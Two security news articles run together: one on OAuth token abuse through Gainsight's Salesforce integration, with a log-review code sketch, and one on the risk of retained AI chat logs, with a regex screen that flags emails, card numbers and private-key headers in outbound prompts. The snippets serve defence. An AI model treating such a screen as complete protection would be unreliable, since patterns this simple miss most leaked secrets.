Salesforce was the first to flag suspicious activity originating from Gainsight's connected applications. As a precautionary measure, Salesforce revoked all associated access tokens and, for some time, disabled the concerned integrations. The company also released detailed indicators of compromise, timelines of malicious activity, and guidance urging customers to review authentication logs and API usage within their own environments.
Gainsight later confirmed that unauthorized parties misused certain OAuth tokens linked to its Salesforce-connected app. According to its leadership, only a small number of customers have so far reported confirmed data impact. However, several independent security teams, including Google's Threat Intelligence Group, reported signs that the intrusion may have reached far more Salesforce instances than initially acknowledged. These differing numbers are not unusual: supply-chain incidents often reveal their full extent only after weeks of log analysis and correlation.
At this time, investigators understand the attack as a case of token abuse, not a failure of Salesforce's underlying platform. OAuth tokens are long-lived keys that let approved applications make API calls on behalf of customers. Once attackers hold them, they can pull CRM records through legitimate channels, which makes detection far more challenging. Because this approach lets intruders bypass common login checks, Salesforce has focused on log review and token rotation as immediate priorities.
To enhance visibility, Gainsight has onboarded Mandiant to conduct a forensic investigation into the incident. The company is investigating historical logs, token behavior, connector activity, and cross-platform data flows to understand the attacker's movements and whether other services were impacted. As a precautionary measure, Gainsight has also worked with platforms including HubSpot, Zendesk, and Gong to temporarily revoke related tokens until investigators can confirm they are safe to restore.
The incident is similar to other attacks that happened this year, where other Salesforce integrations were used to siphon customer records without exploiting any direct vulnerability in Salesforce. Repeated patterns here illustrate a structural challenge: organizations may secure their main cloud platform rigorously, but one compromised integration can open a path to wider unauthorized access.
But for customers, the best steps are as straightforward as ever: monitor Salesforce authentication and API logs for anomalous access patterns; invalidate or rotate existing OAuth tokens; reduce third-party app permissions to the bare minimum; and, if possible, apply IP restrictions or allowlists to further restrict the range of sources from which API calls can be made.
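For the log-review step, here is a hedged sketch under stated assumptions: the org has Salesforce Event Monitoring licensed, a valid access token, and a reachable instance URL (all placeholders below). It lists recent EventLogFile records via the standard REST query endpoint so the underlying CSV logs can be diffed against known-good connected-app activity.

```ts
// List recent Salesforce EventLogFile records (API + Login events) so the
// underlying CSV logs can be reviewed for anomalous OAuth/connected-app use.
const INSTANCE = 'https://yourorg.my.salesforce.com'; // placeholder org URL
const TOKEN = process.env.SF_ACCESS_TOKEN ?? '';      // placeholder token source

async function listRecentLogs(): Promise<void> {
  const soql =
    "SELECT Id, EventType, LogDate FROM EventLogFile " +
    "WHERE LogDate = LAST_N_DAYS:7 AND EventType IN ('API', 'Login')";
  const url = `${INSTANCE}/services/data/v58.0/query/?q=${encodeURIComponent(soql)}`;
  const res = await fetch(url, { headers: { Authorization: `Bearer ${TOKEN}` } });
  const data = await res.json();
  for (const record of data.records ?? []) {
    // Each record references a CSV log file; unusual source IPs or
    // connected-app client IDs inside those files are the signal to chase.
    console.log(record.EventType, record.LogDate, record.Id);
  }
}

void listRecentLogs();
```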
Both companies say they will provide further updates and support customers affected by the issue. The incident is yet another reminder that in modern cloud ecosystems, the security of one vendor often depends on the security practices of everyone in its integration chain.
Many organisations are starting to recognise a security problem that has been forming silently in the background. Conversations employees hold with public AI chatbots can accumulate into a long-term record of sensitive information, behavioural patterns, and internal decision-making. As reliance on AI tools increases, these stored interactions may become a serious vulnerability that companies have not fully accounted for.
The concern resurfaced after a viral trend in late 2024 in which social media users asked AI models to highlight things they “might not know” about themselves. Most treated it as a novelty, but the trend revealed a larger issue. Major AI providers routinely retain prompts, responses, and related metadata unless users disable retention or use enterprise controls. Over extended periods, these stored exchanges can unintentionally reveal how employees think, communicate, and handle confidential tasks.
This risk becomes more severe when considering the rise of unapproved AI use at work. Recent business research shows that while the majority of employees rely on consumer AI tools to automate or speed up tasks, only a fraction of companies officially track or authorise such usage. This gap means workers frequently insert sensitive data into external platforms without proper safeguards, enlarging the exposure surface beyond what internal security teams can monitor.
Vendor assurances do not fully eliminate the risk. Although companies like OpenAI, Google, and others emphasize encryption and temporary chat options, their systems still operate within legal and regulatory environments. One widely discussed court order in 2025 required the preservation of AI chat logs, including previously deleted exchanges. Even though the order was later withdrawn and the company resumed standard deletion timelines, the case reminded businesses that stored conversations can resurface unexpectedly.
Technical weaknesses also contribute to the threat. Security researchers have uncovered misconfigured databases operated by AI firms that contained user conversations, internal keys, and operational details. Other investigations have demonstrated that prompt-based manipulation in certain workplace AI features can cause private channel messages to leak. These findings show that vulnerabilities do not always come from user mistakes; sometimes the supporting AI infrastructure itself becomes an entry point.
Criminals have already shown how AI-generated impersonation can be exploited. A notable example involved attackers using synthetic voice technology to imitate an executive, tricking an employee into transferring funds. As AI models absorb years of prompt history, attackers could use stylistic and behavioural patterns to impersonate employees, tailor phishing messages, or replicate internal documents.
Despite these risks, many companies still lack comprehensive AI governance. Studies reveal that employees continue to insert confidential data into AI systems, sometimes knowingly, because it speeds up their work. Compliance requirements such as GDPR’s strict data minimisation rules make this behaviour even more dangerous, given the penalties for mishandling personal information.
Experts advise organisations to adopt structured controls. This includes building an inventory of approved AI tools, monitoring for unsanctioned usage, conducting risk assessments, and providing regular training so staff understand what should never be shared with external systems. Some analysts also suggest that instead of banning shadow AI outright, companies should guide employees toward secure, enterprise-level AI platforms.
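As one concrete form such a control could take, here is a hypothetical pre-submission screen that flags obviously sensitive material in a prompt before it leaves for an external AI service. The patterns are illustrative stand-ins for an organisation's own classifiers and blocklists, not a production DLP rule set.

```ts
// Screen an outbound AI prompt for obviously sensitive material. Patterns
// are illustrative; real deployments would use proper DLP classifiers.
const SENSITIVE_PATTERNS: Array<[label: string, pattern: RegExp]> = [
  ['email address', /[\w.+-]+@[\w-]+\.[\w.-]+/],
  ['credit-card-like number', /\b(?:\d[ -]?){13,16}\b/],
  ['private key header', /-----BEGIN [A-Z ]*PRIVATE KEY-----/],
];

function screenPrompt(prompt: string): string[] {
  return SENSITIVE_PATTERNS
    .filter(([, pattern]) => pattern.test(prompt))
    .map(([label]) => label);
}

const findings = screenPrompt(
  'Summarise this thread: contact jane.doe@corp.example, card 4111 1111 1111 1111',
);
if (findings.length > 0) {
  // Block, redact, or route for review rather than silently forwarding.
  console.warn('prompt held for review; matched:', findings.join(', '));
}
```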
If companies fail to act, each casual AI conversation can slowly accumulate into a dataset capable of exposing confidential operations. While AI brings clear productivity benefits, unmanaged use may convert everyday workplace conversations into one of the most overlooked security liabilities of the decade.